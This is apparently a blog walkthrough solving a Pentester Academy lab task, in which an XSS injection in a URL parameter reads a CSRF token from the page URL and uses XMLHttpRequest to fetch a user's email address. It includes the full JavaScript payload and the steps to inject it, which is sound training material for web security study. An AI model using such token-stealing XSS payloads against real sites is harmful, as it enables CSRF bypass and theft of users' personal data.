Hello Internet people, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. In this task, we learn how to use, find and play with CSRF token.CSRF tokens are used to mitigate Cross-site request forgery, but these tokens also would be bypass if not used properly. You can view solutions to the other tasks here.

Task 16: Extracting CSRF Tokens | TASK LINK

The task is to find John’s Email Address using an XSS vulnerability on that page but there is a new concept arise and that is the use of CSRF tokens. You can see the token value in the URL itself, and we have to use that value to get email id. This task is also of moderate level, you have to have the knowledge of XMLHttpRequest method. You should know what is the syntax and how to use it.
Solution:
The injection point is the same as in the previous task is the url parameter, You can apply some injections to verify that too. While viewing the source code you will see this comment “ Email can be obtained via a GET request to /lab/webapp/jfp/16/email with params name=john and anything else you might need? 🙂” in the source code, that may have been written by the developer. Type in the complete URL “http://pentesteracademylab.appspot.com/lab/webapp/jfp/16/email?name=john” into the URL bar and you will not see the email address of John in this case.

<script>
var path = location.href.split("=")[2];
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if (this.status == 200 && this.readyState == 4)
{
var data = this.responseText;
document.getElementById('result').innerHTML = data;
}
};
req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/16/email?name=john&csrf_token='+path,true);
req.send();
</script>

In this code we have to first get the token value, we cannot put the value directly into the code, but we have to get it from the URL itself. For this, I use “location.href.split(“=”)[2]” to get and split it at “=” and set the value to the variable “path” after that we will create an XML request to the commented link and retrieve the response in text format and put that into the div field with id=”result”. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page.
Refer this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided at Pentester Academy website.